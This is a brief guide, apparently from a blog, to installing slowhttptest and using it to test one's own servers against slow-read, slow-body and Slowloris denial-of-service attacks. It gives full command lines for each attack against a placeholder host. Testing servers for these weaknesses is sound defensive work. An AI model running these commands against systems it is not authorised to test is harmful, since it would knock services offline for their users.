Slow read DOS which utilises a known vulnerability in TCP can now be tested for using Slowhttptest-1.3

Here is a quick guide to testing your servers including two other DOS attacks using Slowhttptest.

Install Grab the latest slowhttptest

$ tar -xzvf slowhttptest-x.x.tar.gz
$ cd slowhttptest-x.x
$ ./configure –prefix=PREFIX
$ make
$ sudo make install

Slowread DOS Example

$./slowhttptest -c 1000 -X -g -o slow_read_stats -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u https://myseceureserver/resources/index.html -p 3

Slowbody DOS Example

$./slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u https://myseceureserver/resources/loginform.html -x 10 -p 3

Slowloris DOS Example

$./slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u https://myseceureserver/resources/index.html -x 24 -p 3